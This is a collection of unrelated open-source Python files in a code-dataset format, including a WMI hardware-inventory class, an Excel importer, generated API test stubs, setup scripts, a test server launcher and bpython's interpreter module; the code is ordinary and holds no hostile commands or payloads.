cv._check_files("SUBTASK Y", dict(), [files[0]], Mock())
assert cv.get_verification_state("SUBTASK Y") == SubtaskVerificationState.VERIFIED
cv._check_files("SUBTASK Z", dict(), ["not a file"], Mock())
assert cv.get_verification_state("SUBTASK Z") == SubtaskVerificationState.WRONG_ANSWER
|
crutchcorn/WMIControl | machineclasses/WMIMachineClass.py | Python | mpl-2.0 | 6,411 | 0.004212 | # Core imports
from lib.setSettings import djangopath
djangopath(up=1, settings='settings')
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# DB models and exceptions
from data import models
from machineclasses.MachineClass import Machine
class WMIMachine(Machine):
def lookupWMICPU(self, cpu):
archName, createdArch = models.WMICodes.objects.get_or_create(code=cpu.Architecture, identifier="Architecture",
wmiObject="Win32_Processor")
familyName, createdFamily = models.WMICodes.objects.get_or_create(code=cpu.Family, identifier="Family",
wmiObject="Win32_Processor")
upgradeName, createdUpgrade = models.WMICodes.objects.get_or_create(code=cpu.UpgradeMethod,
identifier="UpgradeMethod",
wmiObject="Win32_Processor")
if createdArch:
archName.machines.add(self.machine)
if createdFamily:
familyName.machines.add(self.machine)
if createdUpgrade:
upgradeName.machines.add(self.machine)
try:
PartNumber = cpu.PartNumber.strip()
except AttributeError:
PartNumber = None
try:
SerialNumber = cpu.SerialNumber.strip()
except AttributeError:
SerialNumber = None
return archName, familyName, upgradeName, PartNumber, SerialNumber
def createWMICPU(self, cpu):
archName, familyName, upgradeName, PartNumber, SerialNumber = self.lookupWMICPU(cpu)
return self.createCPU(
name=cpu.Name.strip(),
manufacturer=cpu.Manufacturer,
partnum=PartNumber,
arch=archName.name,
family=familyName.name,
upgradeMethod=upgradeName.name,
cores=cpu.NumberOfCores,
threads=cpu.ThreadCount,
speed=cpu.MaxClockSpeed,
serial=SerialNumber,
location=cpu.DeviceID
)
def lookupWMIRAM(self, ram):
formName, createdForm = models.WMICodes.objects.get_or_create(code=ram.FormFactor, identifier="FormFactor",
wmiObject="Win32_PhysicalMemory")
memTypeName, createdMemType = models.WMICodes.objects.get_or_create(code=ram.MemoryType,
identifier="MemoryType",
wmiObject="Win32_PhysicalMemory")
if createdForm:
formName.machines.add(self.machine)
if createdMemType:
memTypeName.machines.add(self.machine)
# Clean data and test if exists all at once. WMI returns some weird stuff, don't judge
try:
PartNumber = ram.PartNumber.strip()
except AttributeError:
PartNumber = None
try:
SerialNumber = ram.SerialNumber.strip()
except AttributeError:
SerialNumber = None
return formName, memTypeName, PartNumber, SerialNumber
def createWMIRAM(self, ram):
formName, memTypeName, PartNumber, SerialNumber = self.lookupWMIRAM(ram)
return self.createRAM(
size=int(ram.Capacity),
            manufacturer=ram.Manufacturer,
partnum=PartNumber,
speed=ram.Speed,
            formFactor=formName.name,
memoryType=memTypeName.name,
serial=SerialNumber,
location=ram.DeviceLocator
)
def lookupWMIGPU(self, gpu):
vidArchName, createdVidArch = models.WMICodes.objects.get_or_create(code=gpu.VideoArchitecture,
identifier="VideoArchitecture",
wmiObject="Win32_VideoController")
memTypeName, createdMemType = models.WMICodes.objects.get_or_create(code=gpu.VideoMemoryType,
identifier="VideoMemoryType",
wmiObject="Win32_VideoController")
if createdVidArch:
vidArchName.machines.add(self.machine)
if createdMemType:
memTypeName.machines.add(self.machine)
return vidArchName.name, memTypeName.name
def createWMIGPU(self, gpu):
vidArchName, memTypeName = self.lookupWMIGPU(gpu)
return self.createGPU(
name=gpu.Name.strip(),
size=int(gpu.AdapterRAM),
refresh=gpu.MaxRefreshRate,
arch=vidArchName,
memoryType=memTypeName,
location=gpu.DeviceID
)
def createWMILAN(self, net):
return self.createLAN(
name=net.Name.strip(),
manufacturer=net.Manufacturer,
mac=net.MACAddress,
location=net.DeviceID
)
def createWMIDrive(self, disk):
return self.createDrive(
name=disk.Model,
size=disk.Size,
interface=disk.InterfaceType,
manufacturer=disk.Manufacturer,
serial=disk.SerialNumber,
partitions=disk.Partitions
)
def createWMILogicDisk(self, disk, logicdisk):
disktype = self.lookupWMILogicDisk(disktype=logicdisk.DriveType)
return self.createLogicDisk(
disk=disk,
name=logicdisk.Name,
mount=logicdisk.DeviceID,
filesystem=logicdisk.FileSystem,
size=logicdisk.Size,
freesize=logicdisk.FreeSpace,
disktype=disktype
)
def lookupWMILogicDisk(self, disktype):
driveTypeName, createdDriveType = models.WMICodes.objects.get_or_create(code=disktype,
identifier="DriveType",
wmiObject="Win32_LogicalDisk")
if createdDriveType:
driveTypeName.machines.add(self.machine)
return driveTypeName.name
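# A hedged usage sketch: the wmi package's WMI() connection and its
# Win32_Processor()/Win32_PhysicalMemory() queries are real API, but the
# WMIMachine constructor arguments are hypothetical here, since they belong
# to the Machine base class defined in another module.
#
#   import wmi
#   conn = wmi.WMI()
#   machine = WMIMachine(...)  # construct as MachineClass.Machine requires
#   for cpu in conn.Win32_Processor():
#       machine.createWMICPU(cpu)
#   for stick in conn.Win32_PhysicalMemory():
#       machine.createWMIRAM(stick)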
|
qedsoftware/commcare-hq | corehq/util/spreadsheets/excel_importer.py | Python | bsd-3-clause | 1,783 | 0.001683 | from corehq.util.spreadsheets.excel import WorkbookJSONReader
from soil import DownloadBase
class UnknownFileRefException(Exception):
pass
class ExcelImporter(object):
"""
Base class for `SingleExcelImporter` and `MultiExcelImporter`.
This is not meant to be used directly.
"""
def __init__(self, task, file_ref_id):
self.task = task
self.progress = 0
if self.task:
DownloadBase.set_progress(self.task, 0, 100)
download_ref = DownloadBase.get(file_ref_id)
if download_ref is None:
            raise UnknownFileRefException("Could not find file with ref %s. It may have expired" % file_ref_id)
self.workbook = WorkbookJSONReader(download_ref.get_filename())
def mark_complete(self):
if self.task:
DownloadBase.set_progress(self.task, 100, 100)
def add_progress(self, count=1):
self.progress += count
if self.task:
DownloadBase.set_progress(self.task, self.progress, self.total_rows)
class SingleExcelImporter(ExcelImporter):
"""
Manage importing from an excel file with only one
worksheet.
"""
    def __init__(self, task, file_ref_id):
super(SingleExcelImporter, self).__init__(task, file_ref_id)
self.worksheet = self.workbook.worksheets[0]
self.total_rows = self.worksheet.worksheet.get_highest_row()
class MultiExcelImporter(ExcelImporter):
"""
Manage importing from an excel file with multiple
relevant worksheets.
"""
    def __init__(self, task, file_ref_id):
super(MultiExcelImporter, self).__init__(task, file_ref_id)
self.worksheets = self.workbook.worksheets
self.total_rows = sum(ws.worksheet.get_highest_row() for ws in self.worksheets)
|
ltowarek/budget-supervisor | third_party/saltedge/test/test_income_report_streams_regular.py | Python | mit | 1,008 | 0 | # coding: utf-8
"""
Salt Edge Account Information API
    API Reference for services # noqa: E501
OpenAPI spec version: 5.0.0
Contact: support@saltedge.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import unittest
import swagger_client
from swagger_client.models.income_report_streams_regular import IncomeReportStreamsRegular # noqa: E501
from swagger_client.rest import ApiException
class TestIncomeReportStreamsRegular(unittest.TestCase):
"""IncomeReportStreamsRegular unit test stubs"""
def setUp(self):
pass
def tearDown(self):
pass
def testIncomeReportStreamsRegular(self):
"""Test IncomeReportStreamsRegular"""
# FIXME: construct object with mandatory attributes with example values
# model = swagger_client.models.income_report_streams_regular.IncomeReportStreamsRegular() # noqa: E501
pass
if __name__ == '__main__':
unittest.main()
|
nkgeorgiev/psilyp | setup.py | Python | gpl-2.0 | 286 | 0.003497 | from distutils.core import setup
setup(name='psilyp',
version='1.0',
description='A Basic lisp interpreter',
author='Nikolay Georgiev',
author_email='nikolaykgeorgiev@gmail.com',
      url='https://github.com/HuKCaHa/psilyp',
packages=['psilyp'],
)
|
philipkershaw/ndg_security_server | ndg/security/server/test/integration/openidrelyingparty/authenticationservicesapp.py | Python | bsd-3-clause | 2,769 | 0.006862 | #!/usr/bin/env python
"""NDG Security test harness for authorisation middleware
NERC DataGrid Project
"""
__author__ = "P J Kershaw"
__date__ = "20/11/08"
__copyright__ = "(C) 2009 Science a | nd Technology Facilities Council"
__contact__ = "Philip.Kershaw@stfc.ac.uk"
__revision__ = "$Id$"
from os import path
import optparse
from OpenSSL import SSL
from ndg.security.server.utils.paste_utils import PasteDeployAppServer
from ndg.security.test.unit.base import BaseTestCase
INI_FILEPATH = path.join(path.dirname(path.abspath(__file__)),
'authenticationservices.ini')
DEFAULT_PORT = 6443
# To start run
# $ paster serve authenticationservices.ini or run this file as a script
# $ ./authenticationservicesapp.py [port #]
if __name__ == '__main__':
defCertFilePath = path.join(BaseTestCase.NDGSEC_TEST_CONFIG_DIR,
'pki',
'localhost.crt')
defPriKeyFilePath = path.join(BaseTestCase.NDGSEC_TEST_CONFIG_DIR,
'pki',
'localhost.key')
parser = optparse.OptionParser()
parser.add_option("-p",
"--port",
dest="port",
default=DEFAULT_PORT,
type='int',
help="port number to run under")
parser.add_option("-s",
"--with-ssl",
dest="withSSL",
default='True',
help="Run with SSL")
parser.add_option("-c",
"--cert-file",
dest='certFilePath',
default=defCertFilePath,
help="SSL Certificate file")
parser.add_option("-k",
"--private-key-file",
default=defPriKeyFilePath,
dest='priKeyFilePath',
help="SSL private key file")
parser.add_option("-f",
"--conf",
dest="configFilePath",
default=INI_FILEPATH,
help="Configuration file path")
opt = parser.parse_args()[0]
if opt.withSSL.lower() == 'true':
ssl_context = SSL.Context(SSL.SSLv23_METHOD)
ssl_context.set_options(SSL.OP_NO_SSLv2)
ssl_context.use_privatekey_file(opt.priKeyFilePath)
ssl_context.use_certificate_file(opt.certFilePath)
else:
ssl_context = None
server = PasteDeployAppServer(cfgFilePath=path.abspath(opt.configFilePath),
port=opt.port,
ssl_context=ssl_context)
server.start() |
aktorion/bpython | bpython/curtsiesfrontend/interpreter.py | Python | mit | 4,702 | 0 | import code
import traceback
import sys
from codeop import CommandCompiler
from six import iteritems
from pygments.token import Generic, Token, Keyword, Name, Comment, String
from pygments.token import Error, Literal, Number, Operator, Punctuation
from pygments.token import Whitespace
from pygments.formatter import Formatter
from pygments.lexers import get_lexer_by_name
from bpython.curtsiesfrontend.parse import parse
from bpython.repl import Interpreter as ReplInterpreter
from bpython.config import getpreferredencoding
from bpython._py3compat import py3
default_colors = {
Generic.Error: 'R',
Keyword: 'd',
Name: 'c',
Name.Builtin: 'g',
Comment: 'b',
String: 'm',
Error: 'r',
Literal: 'd',
Number: 'M',
Number.Integer: 'd',
Operator: 'd',
Punctuation: 'd',
Token: 'd',
Whitespace: 'd',
Token.Punctuation.Parenthesis: 'R',
Name.Function: 'd',
Name.Class: 'd'
}
class BPythonFormatter(Formatter):
"""This is subclassed from the custom formatter for bpython. Its format()
    method receives the tokensource and outfile params passed to it from the
    Pygments highlight() method and slops them into the appropriate format
string as defined above, then writes to the outfile object the final
formatted string. This does not write real strings. It writes format string
(FmtStr) objects.
See the Pygments source for more info; it's pretty
straightforward."""
def __init__(self, color_scheme, **options):
self.f_strings = {}
for k, v in iteritems(color_scheme):
self.f_strings[k] = '\x01%s' % (v,)
Formatter.__init__(self, **options)
def format(self, tokensource, outfile):
o = ''
for token, text in tokensource:
while token not in self.f_strings:
token = token.parent
o += "%s\x03%s\x04" % (self.f_strings[token], text)
outfile.write(parse(o.rstrip()))
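# A minimal usage sketch, not part of the original module: pygments.highlight
# drives format() above. `sink` is a hypothetical object whose write() accepts
# the FmtStr values produced by parse() (bpython supplies its own).
#
#   from pygments import highlight
#   from pygments.lexers import PythonLexer
#   highlight("x = 1\n", PythonLexer(),
#             BPythonFormatter(default_colors), outfile=sink)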
class Interp(ReplInterpreter):
def __init__(self, locals=None, encoding=None):
"""Constructor.
The optional 'locals' argument specifies the dictionary in
which code will be executed; it defaults to a newly created
dictionary with key "__name__" set to "__console__" and key
"__doc__" set to None.
We include an argument for the outfile to pass to the formatter for it
to write to.
"""
if locals is None:
locals = {"__name__": "__console__", "__doc__": None}
if encoding is None:
encoding = getpreferredencoding()
ReplInterpreter.__init__(self, locals, encoding)
self.locals = locals
self.compile = CommandCompiler()
# typically changed after being instantiated
self.write = lambda stuff: sys.stderr.write(stuff)
self.outfile = self
def writetb(self, lines):
tbtext = ''.join(lines)
lexer = get_lexer_by_name("pytb")
self.format(tbtext, lexer)
# TODO for tracebacks get_lexer_by_name("pytb", stripall=True)
def format(self, tbtext, lexer):
traceback_informative_formatter = BPythonFormatter(default_colors)
traceback_code_formatter = BPythonFormatter({Token: ('d')})
tokens = list(lexer.get_tokens(tbtext))
no_format_mode = False
cur_line = []
for token, text in tokens:
if text.endswith('\n'):
cur_line.append((token, text))
if no_format_mode:
traceback_code_formatter.format(cur_line, self.outfile)
no_format_mode = False
else:
traceback_informative_formatter.format(cur_line,
self.outfile)
cur_line = []
elif text == ' ' and cur_line == []:
no_format_mode = True
cur_line.append((token, text))
else:
cur_line.append((token, text))
assert cur_line == [], cur_line
def code_finished_will_parse(s, compiler):
"""Returns a tuple of whether the buffer could be complete and whether it
will parse
True, True means code block is finished and no predicted parse error
True, False means code block is finished because a parse error is predicted
False, True means code block is unfinished
False, False isn't possible - an predicted error makes code block done"""
try:
finished = bool(compiler(s))
code_will_parse = True
except (ValueError, SyntaxError, OverflowError):
finished = True
code_will_parse = False
return finished, code_will_parse
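if __name__ == '__main__':
    # Small self-check added for illustration (not part of the original
    # module): a complete statement, an open block, and a syntax error
    # exercise the three reachable outcomes documented above.
    _compiler = CommandCompiler()
    assert code_finished_will_parse('x = 1', _compiler) == (True, True)
    assert code_finished_will_parse('def f():', _compiler) == (False, True)
    assert code_finished_will_parse('def f(:', _compiler) == (True, False)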
|
hickford/datrie | setup.py | Python | lgpl-2.1 | 2,391 | 0.000418 | #! /usr/bin/env python
"""Super-fast, efficiently stored Trie for Python."""
import os
import sys
from setuptools import setup, Extension
from setuptools.command.test import test as TestCommand
LIBDATRIE_DIR = 'libdatrie/datrie'
LIBDATRIE_FILE_NAMES = [
'alpha-map.c', 'darray.c', 'fileutils.c', 'tail.c', 'trie.c',
'dstring.c', 'trie-string.c',
]
LIBDATRIE_FILES = [os.path.join(LIBDATRIE_DIR, name)
for name in LIBDATRIE_FILE_NAMES]
DESCRIPTION = __doc__
LONG_DESCRIPTION = open('README.rst').read() + open('CHANGES.rst').read()
LICENSE = 'LGPLv2+'
CLASSIFIERS = [
'Development Status :: 4 - Beta',
'Intended Audience :: Developers',
'Intended Audience :: Science/Research',
'License :: OSI Approved :: GNU Lesser General Public License v2 or later (LGPLv2+)',
'Programming Language :: Cython',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: Implementation :: CPython',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Scientific/Engineering :: Information Analysis',
'Topic :: Text Processing :: Linguistic'
]
class PyTest(TestCommand):
"""Unfortunately :mod:`setuptools` support only :mod:`unittest`
based tests, thus, we have to overider | build-in ``test`` command
to run :mod:`pytest`.
"""
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
        sys.exit(pytest.main(self.test_args + ["./tests"]))
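# With the cmdclass mapping below, `python setup.py test` dispatches to
# run_tests() above and hands the suite to pytest instead of the default
# unittest-based discovery.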
setup(
name="datrie",
version="0.7",
description=DESCRIPTION,
long_description=LONG_DESCRIPTION,
author='Mikhail Korobov',
author_email='kmike84@gmail.com',
license=LICENSE,
url='https://github.com/kmike/datrie',
classifiers=CLASSIFIERS,
ext_modules=[
Extension("datrie", [
'src/datrie.c',
'src/cdatrie.c',
'src/stdio_ext.c'
] + LIBDATRIE_FILES, include_dirs=['libdatrie'])
],
tests_require=["pytest", "hypothesis"],
cmdclass={"test": PyTest}
)
|